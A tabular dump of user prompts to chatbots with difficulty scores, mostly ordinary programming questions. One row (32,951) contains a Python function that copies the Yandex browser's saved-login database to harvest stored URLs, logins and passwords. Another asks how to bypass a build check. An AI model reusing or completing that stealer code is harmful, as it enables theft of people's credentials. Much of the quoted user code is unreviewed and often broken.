row_id int64 0 48.4k | init_message stringlengths 1 342k | conversation_hash stringlengths 32 32 | scores dict |
|---|---|---|---|
32,926 | is this golang code correct? package main
import "fmt"
func HelloWorld() {
// BEGIN (write your solution here)
fmt.Println("Hello, World!")
// END
} | 602831af092b0cbfb46f6b5221ea1a84 | {
"intermediate": 0.284368097782135,
"beginner": 0.6295892596244812,
"expert": 0.08604256808757782
} |
32,927 | his error originates from a subprocess, and is likely not a problem with pip.
ERROR: Failed building wheel for Pillow
Failed to build Pillow
ERROR: Could not build wheels for Pillow, which is required to install pyproject.toml-based projects | ae91c4226cf1788c1b29c3efec9b17d6 | {
"intermediate": 0.4875507652759552,
"beginner": 0.24999630451202393,
"expert": 0.2624529004096985
} |
32,928 | #include <iostream>
class Int17Matrix3D {
public:
Int17Matrix3D(int x, int y, int z) : width_(x), height_(y), depth_(z) {
array_ = new int32_t[kNumLenght_ * x * y * z];
std::memset(array_, 0, kNumLenght_ * x * y * z * sizeof(int32_t));
}
~Int17Matrix3D() {
delete[] array_;
}
Int17Matrix3D(const... | 25cf6ecdb829b5b0204f0cf3994400c7 | {
"intermediate": 0.266336590051651,
"beginner": 0.4546990394592285,
"expert": 0.2789643704891205
} |
32,929 | 2023-11-29 15:23:30.090 `st.cache` is deprecated. Please use one of Streamlit's new caching commands,
`st.cache_data` or `st.cache_resource`. | 9d55580dfcde3e21548c676de46123fe | {
"intermediate": 0.342949241399765,
"beginner": 0.2836536169052124,
"expert": 0.3733971416950226
} |
32,930 | solidity
enum VotingSystem {
MEMBERSHIP,
NETWORK_GOVERNANCE_TOKEN,
ANY_TOKEN
}
struct VotingToken {
uint256 chainId;
address token;
address balanceType; // voting power strategy
// address 1
// address 2
}
struct VotingSystemTokenCheckpoint {
... | a51c51c3f510cf1d549e081f73f3e953 | {
"intermediate": 0.3524542450904846,
"beginner": 0.40467002987861633,
"expert": 0.24287569522857666
} |
32,931 | i want to give you a pdf to analyse | 475bcf7beb3dceff9de70118feb8fe84 | {
"intermediate": 0.3424724340438843,
"beginner": 0.2898547649383545,
"expert": 0.36767280101776123
} |
32,932 | help me I also want to make so the user can continue asking questions but to do that I need to make sure the cleint also gets the data so it can store it in the current message group:
@app.post("/search1")
async def predict(request: Request, user: str = Depends(get_current_user)):
body = await request.body()
c... | 75aca90564c748678e7f76d18b77d570 | {
"intermediate": 0.37188953161239624,
"beginner": 0.46290430426597595,
"expert": 0.1652061492204666
} |
32,933 | Create golang script which uses bento4 mp4decrypt as cgo | c2ac1948a9b75c238142958ca463a629 | {
"intermediate": 0.4808037281036377,
"beginner": 0.21495240926742554,
"expert": 0.3042438328266144
} |
32,934 | How to add default @State paremeter to all View's in ios application via extend of View protocol? | 5d26ecda239a49085e245bb8ee054ffe | {
"intermediate": 0.5295990705490112,
"beginner": 0.18817941844463348,
"expert": 0.2822215259075165
} |
32,935 | Prepare a detailed report on trilateration and the dangers of its use. | 278189daff6c53fd8ea9a90044724104 | {
"intermediate": 0.28682589530944824,
"beginner": 0.3437844514846802,
"expert": 0.3693896532058716
} |
32,936 | when i used the following code in matlab to shift the data to zero axis, it didnt work. why?
% Detrend the data
mean_value = mean(dataMatrix); % Compute the mean of the dataset
% Subtract the mean from the dataset to detrend
detrended_data = dataMatrix - repmat(mean_value, size(dataMatrix, 1), 1); | ee86c375e1a0db9e5be34c1addceeed8 | {
"intermediate": 0.5264975428581238,
"beginner": 0.17653754353523254,
"expert": 0.2969648838043213
} |
32,937 | make a flow chart that takes a number and outputs if it should say ‘Fizz’, ‘Buzz’, ‘FizzBuzz’ or the number depending on if it is divisible by 3, divisible by 5, divisible by 3 AND 5 respectively. | d5eb706cb46cacae4d38085ca2c991ef | {
"intermediate": 0.44109436869621277,
"beginner": 0.18398140370845795,
"expert": 0.3749242126941681
} |
32,938 | You're experienced programmer on python with more than 10 years of experience.
Speed up my code:
# считаем платный трафик
# создадим список датафреймов
no_data = []
# для каждого файла в каждой папке
for root, dirs, files in tqdm(os.walk("./data/no")):
for name in files:
# определим его путь и н... | c844449d09f0ab16f602b4a4e7ceeba2 | {
"intermediate": 0.3300638794898987,
"beginner": 0.31492844223976135,
"expert": 0.35500767827033997
} |
32,939 | give command to create branch on git | a884b77579f47a47d4b0e5f80214df73 | {
"intermediate": 0.3851970434188843,
"beginner": 0.22007893025875092,
"expert": 0.394724041223526
} |
32,940 | How to add default @State paremeter to all View’s in ios application via extend of View protocol? | 9989fede011a80221b06e9da8288d8ae | {
"intermediate": 0.5484433174133301,
"beginner": 0.18578940629959106,
"expert": 0.26576727628707886
} |
32,941 | #include <iostream>
class Proxy;
class ConstProxy;
class Int17Matrix3D {
public:
Int17Matrix3D(int x, int y, int z);
Int17Matrix3D(const Int17Matrix3D& other);
~Int17Matrix3D();
Int17Matrix3D& operator=(int32_t value);
Int17Matrix3D& operator[](int index);
int32_t operator[](int index) const;
Int... | a47613441439f38c3a1eee9ac93bb596 | {
"intermediate": 0.27840158343315125,
"beginner": 0.4326339066028595,
"expert": 0.28896450996398926
} |
32,942 | how to detect keyboard input python | 4711cdb4561dce5021db02a8acc45cd4 | {
"intermediate": 0.23405316472053528,
"beginner": 0.19847962260246277,
"expert": 0.567467212677002
} |
32,943 | what game is easy to code for a grade 10 tech cpt using python | 97dc8191ed074b958ad9858f93afa7e5 | {
"intermediate": 0.24785487353801727,
"beginner": 0.5839859247207642,
"expert": 0.16815923154354095
} |
32,944 | hello ,can you help me to replace all the use of vector to array in this code | cff352205a4372edafc9c14264e97863 | {
"intermediate": 0.4474093019962311,
"beginner": 0.2333611100912094,
"expert": 0.3192295730113983
} |
32,945 | Another exception was thrown: type 'int' is not a subtype of type 'String' | c4d9befc181f804490d92ec7c01d84e0 | {
"intermediate": 0.44806969165802,
"beginner": 0.27816012501716614,
"expert": 0.27377012372016907
} |
32,946 | how to copy off all files from linux subdirectories to one directory | ad4e28e6d3ba9851afee044e5ee5dae6 | {
"intermediate": 0.35821375250816345,
"beginner": 0.32467615604400635,
"expert": 0.3171100616455078
} |
32,947 | from sklearn.datasets import fetch_mldata
ImportError: cannot import name 'fetch_mldata' from 'sklearn.datasets' (C:\Users\AME\AppData\Local\Programs\Python\Python311\Lib\site-packages\sklearn\datasets\__init__.py)
PS C:\Users\AME\Documents\Digit_OCR> pip | bcfffa55f436a6e4ecd62a6e286416e9 | {
"intermediate": 0.4699403941631317,
"beginner": 0.2128600776195526,
"expert": 0.3171994686126709
} |
32,948 | C:\src\chromium>fetch --no-history chromium
Updating depot_tools...
Running: 'C:\Users\User\AppData\Local\.vpython-root\store\python_venv-hs7jfbker99b7hrue7pln2q254\contents\Scripts\python3.exe' 'C:\src\depot_tools\gclient.py' root
C:\src\.gclient_entries missing, .gclient file in parent directory C:\src might not be t... | 0fba4005bd2063821cc67b2fe7d552b5 | {
"intermediate": 0.3406387269496918,
"beginner": 0.3054017722606659,
"expert": 0.3539595305919647
} |
32,949 | how to copy of one type from subdirecorys to directory in linux | 31f49af276d277025a54fad00ac186a5 | {
"intermediate": 0.34609052538871765,
"beginner": 0.3155405521392822,
"expert": 0.33836889266967773
} |
32,950 | Is bbr2 the best congestionprovider for gaming? | e20f86fb356b8086e75c2b0716cb3a6b | {
"intermediate": 0.22069764137268066,
"beginner": 0.2215484380722046,
"expert": 0.5577539205551147
} |
32,951 | def Yandexpass():
textyp = 'Passwords Yandex:' + '\n'
textyp += 'URL | LOGIN | PASSWORD' + '\n'
if os.path.exists(os.getenv("LOCALAPPDATA") + '\\Yandex\\YandexBrowser\\User Data\\Default\\Ya Login Data.db'):
shutil.copy2(os.getenv("LOCALAPPDATA") + '\\Yandex\\YandexBrowser\\User Data\\Default\\Ya Lo... | 2c0bb156ffe2df60186621cd4d738699 | {
"intermediate": 0.4129370450973511,
"beginner": 0.3344791531562805,
"expert": 0.2525838315486908
} |
32,952 | regex Match a single character present in the list below [0-9] | bd83f29fcd49e23fcffe835bf381768a | {
"intermediate": 0.3784051537513733,
"beginner": 0.25698572397232056,
"expert": 0.3646091818809509
} |
32,953 | How to generate docs of a c++ project using Doxygen, on the command line, without using a Doxyfile? | e5899153065da1783bd941ca88281066 | {
"intermediate": 0.5363135933876038,
"beginner": 0.18506069481372833,
"expert": 0.2786256968975067
} |
32,954 | Can you write a code in arduino esp32 esp-01 module where gpio 0 is connected to a relay. High is off and low is on. make use of liberary "#include <ESP8266WiFi.h>" I want to control it trough my webbrouwser. The UI should have 3 catergories. Manual , Timer and Clock. Manual: 2 buttons on and off and a status showi... | b653006c25ef0d2fcb86181a6692c977 | {
"intermediate": 0.49687156081199646,
"beginner": 0.3045813739299774,
"expert": 0.19854708015918732
} |
32,955 | i have an image with different geometrical figures with different colors on white background. write a python script that extracts those objects based on color and saves them as different images | 359239096c45ad7776c72a5dc5fa8890 | {
"intermediate": 0.3600408434867859,
"beginner": 0.18330706655979156,
"expert": 0.45665207505226135
} |
32,956 | write a java Problem
Chef has
�
A marbles, and his friend has
�
B. They want to redistribute the marbles among themselves such that after redistributing:
Chef and his friend both have at least one marble each; and
The number of marbles with Chef is divisible by the number of marbles with his friend.
What's the minim... | c3c2afec7a94fa1826e2170ca2c931e3 | {
"intermediate": 0.408231645822525,
"beginner": 0.23963592946529388,
"expert": 0.3521324396133423
} |
32,957 | #include <iostream>
#include <vector>
struct Node {
int id;
Node* left;
Node* right;
Node(int id) : id(id), left(nullptr), right(nullptr) {}
};
struct BST {
Node* root = nullptr;
void clear(Node* node) {
if (node) {
clear(node->left);
clear(node->right);
delete node;
}
... | df0b2baa34f9ee29a021ed0b3b92b841 | {
"intermediate": 0.25715190172195435,
"beginner": 0.4572015702724457,
"expert": 0.2856465280056
} |
32,958 | i downloaded https://github.com/meetrevision/revision-tool but i get an error unsupported build detected. How do i bypass that check to see if I am running revios | d2b8398df2e604e1a88173038fc0d6db | {
"intermediate": 0.5009973645210266,
"beginner": 0.20252077281475067,
"expert": 0.2964818477630615
} |
32,959 | import 'dart:async';
import 'dart:io';
import 'package:fluent_ui/fluent_ui.dart';
import 'package:flutter_localizations/flutter_localizations.dart';
import 'package:mixin_logger/mixin_logger.dart';
import 'package:revitool/l10n/generated/localizations.dart';
import 'package:revitool/screens/home_page.dart';
import 'pa... | 552f5e90ae67ff9d9716f1b3324b6795 | {
"intermediate": 0.3114725649356842,
"beginner": 0.32534754276275635,
"expert": 0.36317989230155945
} |
32,960 | I am trying to build a dart program. how do i do it? | 566a21306bba197ca6fe4c363e376bdf | {
"intermediate": 0.26631981134414673,
"beginner": 0.15972459316253662,
"expert": 0.5739555358886719
} |
32,961 | write me a python code that will plot a hysteresis loop from raw data | 04202c979c0943d64bead49e3b71ec1b | {
"intermediate": 0.3375820517539978,
"beginner": 0.17934367060661316,
"expert": 0.48307421803474426
} |
32,962 | In linux I am using this command to generate the doxygen documentation on the fly and in a terminal:
doxygen -g - | doxygen -
Can you help me adding these extra things:
- Generate only html docs, skipping latex
- Put the output in docs folder
- Use as project name "My project name" | 745b7cb9b813482ff07efdfb83d3e3da | {
"intermediate": 0.5695957541465759,
"beginner": 0.16632938385009766,
"expert": 0.2640748620033264
} |
32,963 | I am trying to recompile https://github.com/meetrevision/revision-tool using some edited code. It uses dart. How do i do that? i already have the sdk | bcb584bf440d1664b7f5d5f44b5cea4d | {
"intermediate": 0.4681456983089447,
"beginner": 0.23784230649471283,
"expert": 0.2940119504928589
} |
32,964 | I am trying to find the resolve the code that gives me the error: unsupported build detected
import 'dart:async';
import 'dart:io';
import 'package:fluent_ui/fluent_ui.dart';
import 'package:flutter_localizations/flutter_localizations.dart';
import 'package:mixin_logger/mixin_logger.dart';
import 'package:revitool/l1... | ccead2095e6a745ed0dd1728898a3117 | {
"intermediate": 0.3344474732875824,
"beginner": 0.3211447596549988,
"expert": 0.3444077968597412
} |
32,965 | How do i bypass this code with a reg tweak:
if (registryUtilsService.readString(
RegistryHive.localMachine,
r'SOFTWARE\Microsoft\Windows NT\CurrentVersion',
'EditionSubVersion') ==
'ReviOS' &&
buildNumber > 19043) {
i('isSupported is true')... | 9ac80c89e95e680c667c7a3024151a39 | {
"intermediate": 0.49185729026794434,
"beginner": 0.3303145170211792,
"expert": 0.17782819271087646
} |
32,966 | How do i turn indexing on | 5f97b6dceadbd7fdce73481b6bc1956c | {
"intermediate": 0.27993565797805786,
"beginner": 0.2023053914308548,
"expert": 0.5177589654922485
} |
32,967 | i am having a problem where the arrow does not shoot correctly when instantiated. However, it shoots perfectly fine if the bow is manually placed into the scene | 5c757d33c61792d3d732f52a700c99cc | {
"intermediate": 0.37855058908462524,
"beginner": 0.30529966950416565,
"expert": 0.31614968180656433
} |
32,968 | using System.Collections;
using System.Collections.Generic;
using UnityEngine;
using UnityEngine.SceneManagement;
public class Chest : MonoBehaviour
{
public float delayTime = 5f;
public GameObject bowPrefab;
public GameObject pistolPrefab;
public GameObject healthPickupPrefab;
private void OnTrig... | b2f5f301576a3f9de19c141a6d1064b0 | {
"intermediate": 0.30027374625205994,
"beginner": 0.5502495765686035,
"expert": 0.14947664737701416
} |
32,969 | Hi | 9a1a9ebfe932e91e1ed4fe6e74ebb673 | {
"intermediate": 0.33010533452033997,
"beginner": 0.26984941959381104,
"expert": 0.400045245885849
} |
32,970 | I have this code:
active_signal = None
orderId = None
clientOrderId = None
buy_entry_price = None
sell_entry_price = None
orderId = None
order = None
def calculate_percentage_difference_buy(entry_price, exit_price):
result = exit_price - entry_price
price_result = entry_price / 100
final_result = resul... | daa2d851bcad4478f9cad0bfebeae1f1 | {
"intermediate": 0.3521760106086731,
"beginner": 0.4439643323421478,
"expert": 0.20385971665382385
} |
32,971 | in c++ i'm adding 10 to a value every frame. how can i smoothly lower that amount (10) as it approaches 160 | 766b7b6b02dfb96f53f3de28ac9cbc2d | {
"intermediate": 0.42898669838905334,
"beginner": 0.18108487129211426,
"expert": 0.38992840051651
} |
32,972 | I have a c++ compiled executable and I want to use it golang as a cgo wrapper | 9f25d75baa494d9f5e134170bac3b349 | {
"intermediate": 0.5320749282836914,
"beginner": 0.19255496561527252,
"expert": 0.2753700613975525
} |
32,973 | import {
generateRandomNumber
} from "../../utils/numbers.js";
import {
fetchTime
} from "../../utils/customConsole.js";
import Config from "./Config.js";
import { HealthComponent, MovementComponent } from "./components/Components.js";
import { EventEmitter } from 'events';
const eventEmitter = new EventEmitter... | 24516c58897792605c63c299013b4197 | {
"intermediate": 0.38338717818260193,
"beginner": 0.4448769688606262,
"expert": 0.171735942363739
} |
32,974 | pairewise avac ggplot(Pla, aes(x = (Test), y = Poids, fill = Jour)) +
geom_boxplot() +
labs(title = "Comparaison Poids pour Abricot à J3,J7", x = "Substrat", y = "Poids") +
scale_fill_manual(values = c(J3="blue",J7="red")) +
theme_minimal() +
scale_y_continuous(trans = 'log10') | 55995239caedd5e9ac5525eee6dd6b5e | {
"intermediate": 0.3518866002559662,
"beginner": 0.2855030298233032,
"expert": 0.3626103103160858
} |
32,975 | ggplot(Pla, aes(x = (Test), y = Poids, fill = Jour)) +
geom_boxplot() +
labs(title = "Comparaison Poids pour Abricot à J3,J7", x = "Substrat", y = "Poids") +
scale_fill_manual(values = c(J3="blue",J7="red")) +
theme_minimal() +
scale_y_continuous(trans = 'log10') ajout p value wilcoxon | 3303d17b51487cf224f2275c5db3b249 | {
"intermediate": 0.32596638798713684,
"beginner": 0.3087243139743805,
"expert": 0.3653092682361603
} |
32,976 | Could you write me roblox code that makes a shop once you click a certain block | 57f10b62710c54686e6c67038455dfb4 | {
"intermediate": 0.5326075553894043,
"beginner": 0.1864359825849533,
"expert": 0.2809564471244812
} |
32,977 | could not find `EnvFilter` in `tracing_subscriber` | 80f079017f5a56318be943741b262dfc | {
"intermediate": 0.3714604079723358,
"beginner": 0.3489992618560791,
"expert": 0.2795403003692627
} |
32,978 | join in python on two different columns | f7eeee5775400d260f4b5ecdf42103ac | {
"intermediate": 0.3069477677345276,
"beginner": 0.26674750447273254,
"expert": 0.42630475759506226
} |
32,979 | https://kittycad.io/ | ed4aba2f913b9c737eb28eb0cada9b36 | {
"intermediate": 0.32269904017448425,
"beginner": 0.21600280702114105,
"expert": 0.4612981677055359
} |
32,980 | how to use this class :
package com.salesforce.dataconnectors.test.endpoint.api;
import static org.assertj.core.api.Assertions.assertThat;
import static org.junit.jupiter.api.Assertions.assertEquals;
import com.salesforce.atf.testclient.extensions.app.DynamicKeyStoreFactoryExtension;
import com.salesforce.atf.testcli... | 5abdb70d7f19402265ff5ce514fe464e | {
"intermediate": 0.3540017604827881,
"beginner": 0.4718475043773651,
"expert": 0.17415082454681396
} |
32,981 | write a batch script that uses poppler to convert all the pages of the pdf to a png sequence | b6af3ebc42019d82eb1c1d8cb37084b3 | {
"intermediate": 0.43890708684921265,
"beginner": 0.17096279561519623,
"expert": 0.39013010263442993
} |
32,982 | help with the code to plot this dataframe:
yld yll
nin 8118.250734 16847.144409
ado 6991.70782 11028.762359
jov 15081.616039 20274.684193
adu 30488.567085 36428.563661
vie 14667.731443 20022.35421
as a stacked barplot | 26401004d34c29ec5b369b4279a91f34 | {
"intermediate": 0.3897494077682495,
"beginner": 0.3400302529335022,
"expert": 0.27022042870521545
} |
32,983 | Create a basic pygame script where you move around a block. It should have gravity and a ground to stand on. | d5a49a283b8b8c39fae897b9c4eba29e | {
"intermediate": 0.36636796593666077,
"beginner": 0.2851373851299286,
"expert": 0.34849461913108826
} |
32,984 | Can you make for me item.properties by this example?:
entity.2000=creeper zombie skeleton spider cave_spider enderman drowned elder_guardian ghast guardian husk magma_cube phantom pillager ravager shulker silverfish slime wither vindication_illager witch wither_skeleton zombie_villager
entity.2001=player | b0a82c1fa49583418ccef9305b304420 | {
"intermediate": 0.30231165885925293,
"beginner": 0.4660528600215912,
"expert": 0.2316354364156723
} |
32,985 | Переведи из matlab в python
function mydiffusion(m,n_x,n_t)
% Для запуска файла необходимо набрать в командном окне: >>
mydiffusion(0,100,100)
close all
xmesh = linspace(0,1, n_x);
tspan = linspace(0,0.4, n_t);
sol = pdepe(m,@mypde,@mydif_ic,@mydif_bc,xmesh,tspan);
u = sol(:,:,1);
[X,T] = meshgrid(xmesh,tspan);
figure
... | 10dc21b5a1ac73f878464c5a8da1d32e | {
"intermediate": 0.2801096439361572,
"beginner": 0.4536602795124054,
"expert": 0.26623010635375977
} |
32,986 | Переведи из matlab в python
function mydiffusion(m,n_x,n_t)
mydiffusion(0,100,100)
close all
xmesh = linspace(0,1, n_x);
tspan = linspace(0,0.4, n_t);
sol = pdepe(m,@mypde,@mydif_ic,@mydif_bc,xmesh,tspan);
u = sol(:,:,1);
[X,T] = meshgrid(xmesh,tspan);
figure
mesh(X,T,u)
xlabel('Координата'),ylabel('Время'), zlabel('Ко... | a1d7c0d2bbfef4e3bfdd126405b22bfa | {
"intermediate": 0.2610686719417572,
"beginner": 0.5127392411231995,
"expert": 0.22619205713272095
} |
32,987 | import pygame
import sys
# Initialize pygame
pygame.init()
# Set up the display
width, height = 640, 480
screen = pygame.display.set_mode((width, height))
pygame.display.set_caption(“Moving Block”)
# Set up the block
block_size = 50
block_color = (255, 0, 0) # Red
block_x = width // 2 - block_size // 2
block_y = he... | 8a84ce4dd2d8e2d6942c6e8c675b4d30 | {
"intermediate": 0.25150370597839355,
"beginner": 0.4625195264816284,
"expert": 0.2859767973423004
} |
32,988 | Using the following inputs, answer the next few questions.
## perform the necessary imports
import numpy as np
import pandas as pd
from sklearn.model_selection import train_test_split
from sklearn.linear_model import LogisticRegression, LinearRegression, Ridge
from sklearn.metrics import recall_score, make_scorer, mea... | 29b126478f4951e4847c331eae529742 | {
"intermediate": 0.3998158574104309,
"beginner": 0.37779292464256287,
"expert": 0.22239123284816742
} |
32,989 | привет я разрабатываю приложение на android studio на языке java сделай так чтобы у этого cardView был анимированый stroke т е он должен переливаться <com.sinaseyfi.advancedcardview.AdvancedCardView
android:id="@+id/cardView"https://github.com/sina-seyfi/advancedcardviewIf you wants to implement gradients on ba... | 21bda39164b7475521f06174b88dd56c | {
"intermediate": 0.5384413599967957,
"beginner": 0.2054450958967209,
"expert": 0.2561134994029999
} |
32,990 | extract every color on image and save it as different image in python | 39d81dd296020d4f9c1fad19078faf9f | {
"intermediate": 0.4466153383255005,
"beginner": 0.17131437361240387,
"expert": 0.38207030296325684
} |
32,991 | const sessionStorageParams = new Map<string, string>();
Object.keys(params).forEach(key => {
if (this.settingsService.settings.prefix.filter(item=> item.startsWith(key)).length > 0)
sessionStorageParams[key] = params[key];
});
if (sessionStorageParams.size > 0){
const jsonString = ... | f5d99188d358524355b9bc6b212a5529 | {
"intermediate": 0.4404461681842804,
"beginner": 0.3984731137752533,
"expert": 0.16108067333698273
} |
32,992 | i have an object on white backgoiund, cut it out from top right pixel to button left using puthon cv2 | a405ea8a3ea25e75c642fd56f5d741c8 | {
"intermediate": 0.3622826933860779,
"beginner": 0.30477288365364075,
"expert": 0.33294442296028137
} |
32,993 | Can you please make a PvZ2 Ancient Egypt lawn please? | 69ed3437ef2c69bda8a2d03416ac5c1f | {
"intermediate": 0.36725592613220215,
"beginner": 0.3143502175807953,
"expert": 0.31839385628700256
} |
32,994 | A company in the Home Delivery domain “On-Time Safely” requested the
submission of several software engineering artefact and deliverables for a new
system that will be used when they start operations. Draw a use case diagram with a minimum of 3 different actors, 8
use cases, at least 1 <<include>> stereotype, and at le... | e9548d1b0afb726f8d626a6e9d66d703 | {
"intermediate": 0.42812633514404297,
"beginner": 0.21051853895187378,
"expert": 0.36135512590408325
} |
32,995 | I need to conver the the Zero timezone to the user local time using type script, how to do it, please use as an example the 2023-11-24T15:57:57.357Z | f2e92efb93a97142e4f5955aeaf0389b | {
"intermediate": 0.3466472625732422,
"beginner": 0.1816190630197525,
"expert": 0.4717337191104889
} |
32,996 | смотри я делаю приложение на android studio на java у меня есть xml в котом есть 2 кнопки и recycler view можешь добавить toolbar в котором будут title фрагмента 2 кнопки и textview при скроле toolbar должен скрываться <?xml version="1.0" encoding="utf-8"?>
<androidx.constraintlayout.widget.ConstraintLayout xmlns:andro... | 34b16fa55aec6abb5dc988bcf0cc1851 | {
"intermediate": 0.3189733624458313,
"beginner": 0.45902496576309204,
"expert": 0.22200165688991547
} |
32,997 | Write a python function to say hello world | c52d899748d05553935ab0a96aab7896 | {
"intermediate": 0.2521403133869171,
"beginner": 0.42835095524787903,
"expert": 0.31950870156288147
} |
32,998 | Enter the elements of a two-dimensional array of numbers line by line. The number of columns is specified. The number of lines in the array, but not less than one, is equal to the maximum modulo element of the initial (zero) line. From the columns of the original array, which form a non-decreasing sequence of numbers, ... | 90a7104a4e1c3de3edf8933cef0030b4 | {
"intermediate": 0.3149864375591278,
"beginner": 0.34841540455818176,
"expert": 0.33659815788269043
} |
32,999 | import 'package:flutter/cupertino.dart';
import 'package:flutter/material.dart';
import 'package:flutter_screenutil/flutter_screenutil.dart';
import 'package:product_selector/screens/handsets/compare/model/handsets_model.dart';
import 'package:product_selector/utilities/colors.dart';
class TableBody extends StatefulWi... | eac19a4b08ab1598709470b7424e91cf | {
"intermediate": 0.3353240489959717,
"beginner": 0.47803524136543274,
"expert": 0.18664070963859558
} |
33,000 | hej | cab68bc319f12049dded16b4effbff80 | {
"intermediate": 0.3328440487384796,
"beginner": 0.28212741017341614,
"expert": 0.385028600692749
} |
33,001 | TASK 3: Military time operates on a 24-hour clock that uses the range 0 - 23 to represent the hours in a 24 hour period. Midnight (12am) is 0 hours, 1:00 a.m. is 1 hour, 2:00 a.m. is 2 hours, …, noon is 12 hours, 1pm is 13 hours, all the way to 11:00 p.m. being 23 hours. The class Time is a data type (see lecture notes... | 34b29d8fdd61de7e276c05d1a10ae4b8 | {
"intermediate": 0.3742425739765167,
"beginner": 0.36702167987823486,
"expert": 0.2587357461452484
} |
33,002 | где ошибка? из-за бага отступы не видно, но они есть
import pyautogui
import msvcrt
import os
File = "путь"
loop = 1
while loop == 1:
global File
print('введите команду: ')
key = msvcrt.getch()
if key == b'y':
pyautogui.moveTo(1300, 1050, 3, pyautogui.easeInOutQuad)
pyautogui.click ()
elif key == b'p' or k... | a93f2656fa6c0fc277da7c38370016ad | {
"intermediate": 0.3219165503978729,
"beginner": 0.5623285174369812,
"expert": 0.11575489491224289
} |
33,003 | смотри при нажатии на предмет у меня изображения в recyclerView становиться черными и заново отображаються как сделать так чтобы они всегда отображались и не перезагружались, даже при скроле они темнеют пока на них не скрольнишся package com.example.cardsbattle.adapters;
import android.animation.LayoutTransition;
im... | bc8f35ba929b3ffc0343379774260bb6 | {
"intermediate": 0.32493969798088074,
"beginner": 0.5790420770645142,
"expert": 0.09601818770170212
} |
33,004 | Почему не работает скрипт В Roblox Studio
Скрипт
local h = script.Parent.Parent:WaitForChild("Humanoid")
local tool = script.Parent
local anim = h:LoadAnimation(script.Parent.anim:WaitForChild("LK AF1"))
tool.Activated:Connect (function(lkAF1)
if lkAF1 then
anim:play()
end
end)
Он почему то не включает анимку | 17f19678eef779afacceb33fd164e9cd | {
"intermediate": 0.43942901492118835,
"beginner": 0.3211787939071655,
"expert": 0.2393922507762909
} |
33,005 | write description with these keywords "A quick and practical introduction to SOLID with examples in java. | d388c5a46e051f5521f285891e55dfde | {
"intermediate": 0.40272125601768494,
"beginner": 0.346405565738678,
"expert": 0.2508731484413147
} |
33,006 | I am making a cross platform c++ wxwidgets project, so far I made it working perfectly in linux and in windows it worked perfectly before I introduces a different way to read files using std::wifstream instead of std::ifstream since it handles unicode characters better. The problem is in windows when reading the file i... | ddf4c27f4164a07cd08709718a44d21a | {
"intermediate": 0.6120828986167908,
"beginner": 0.24031822383403778,
"expert": 0.14759884774684906
} |
33,007 | I am making a cross platform c++ wxwidgets project, so far I made it working perfectly in linux and in windows it worked perfectly before I changed the way to read files using std::wifstream instead of std::ifstream since it handles unicode characters better. The problem is in windows when reading the file it reads it ... | cad2ef6deb98fecf490179dd02b179f2 | {
"intermediate": 0.6280706524848938,
"beginner": 0.18623097240924835,
"expert": 0.18569830060005188
} |
33,008 | I am making a cross platform c++ wxwidgets project, i have a method that reads a file and works well whenever there aren't any unicode characters like latin letters cyrilic japanese alphabet etc. how can I solve this so it can read them correctly?
wxArrayString LoadFile(const wxString& filename)
{
wxArrayS... | a460bfa92c1a6c7eec0603cc40238617 | {
"intermediate": 0.6727063059806824,
"beginner": 0.18639631569385529,
"expert": 0.14089743793010712
} |
33,009 | You are an expert Rust programmer, with a lot of experience in serializing and deserializing data. This is your problem:
You will receive 3 million lines with this format:
Text\tAnother\tText1\tText2\123\t231\t+\tname "alejandro"; lastname "test"; childs "5"; employment "construction";
Text\tAnother\tText1\tText2\123... | b24ac5b8fa6f9ed1ce704ae1395d6dec | {
"intermediate": 0.43361181020736694,
"beginner": 0.3674211800098419,
"expert": 0.19896702468395233
} |
33,010 | you think it's possible to make an automatic ip address sortager through html,css,javascript? the idea is to sort out ips on ack flag and remove them from list. any ideas? | 34f70816e5e92ea21a7d7f0af92d1e5a | {
"intermediate": 0.3781036138534546,
"beginner": 0.11634358018636703,
"expert": 0.5055528283119202
} |
33,011 | function onOpen() {
var ui = SpreadsheetApp.getUi();
ui.createMenu('Навигация')
.addItem('Генерирай документ', 'replaceText')
.addToUi();
}
function replaceText() {
var sheet = SpreadsheetApp.getActiveSpreadsheet().getActiveSheet();
var data = sheet.getDataRange().getValues();
var folderId = '1gNydE... | 71306e3fa23fcabf87f0d90940e1839f | {
"intermediate": 0.38240477442741394,
"beginner": 0.39834102988243103,
"expert": 0.21925415098667145
} |
33,012 | are you able to fix "IndentationError" somehow or not? try replace ident spaces with "X": | 171480342ad539977043feccee0cc2ce | {
"intermediate": 0.47408995032310486,
"beginner": 0.14146167039871216,
"expert": 0.384448379278183
} |
33,013 | are you able to fix "IndentationError" somehow or not? try replace ident spaces with "X": | 1fb3ed24aa3eb27439010c55b46fb1e7 | {
"intermediate": 0.47408995032310486,
"beginner": 0.14146167039871216,
"expert": 0.384448379278183
} |
33,014 | are you able to fix "IndentationError" or not? replace ident spaces with "X": | 30c8e8461a03a4872918d8cdfc30bc39 | {
"intermediate": 0.4602299630641937,
"beginner": 0.1391664445400238,
"expert": 0.40060362219810486
} |
33,015 | are you able to fix "IndentationError" or not? replace ident spaces with "X": | e0d63c65e30aeb6ede28bd84ddb6c152 | {
"intermediate": 0.4602299630641937,
"beginner": 0.1391664445400238,
"expert": 0.40060362219810486
} |
33,016 | are you able to fix "IndentationError" or not? replace ident spaces with "X": | 27869b4d1a06e5ed01966ae99211aa7a | {
"intermediate": 0.4602299630641937,
"beginner": 0.1391664445400238,
"expert": 0.40060362219810486
} |
33,017 | are you able to fix "IndentationError" or not? replace ident spaces with "X": | a57366464f4439a1c8c179a814be27e0 | {
"intermediate": 0.4602299630641937,
"beginner": 0.1391664445400238,
"expert": 0.40060362219810486
} |
33,018 | replace ident spaces with "X": | 351d059242888f52a23c218718223f92 | {
"intermediate": 0.40817543864250183,
"beginner": 0.27077439427375793,
"expert": 0.3210501968860626
} |
33,019 | npm list -g --depth=0
zsh: command not found: npm | 51aff0a3cae3073da8b3a716b3ea9101 | {
"intermediate": 0.30356311798095703,
"beginner": 0.3713219463825226,
"expert": 0.3251148760318756
} |
33,020 | return ListView.builder(
physics: const NeverScrollableScrollPhysics(),
shrinkWrap: true,
itemCount: widget.firstHandsets?.specifications?.length ?? 0,
itemBuilder: (context, index) {
return Table(
border: TableBorder.symmetric(
inside: BorderSide(
... | 60390de2740cd3fefd90f315144d12e6 | {
"intermediate": 0.3287886679172516,
"beginner": 0.4880295991897583,
"expert": 0.18318170309066772
} |
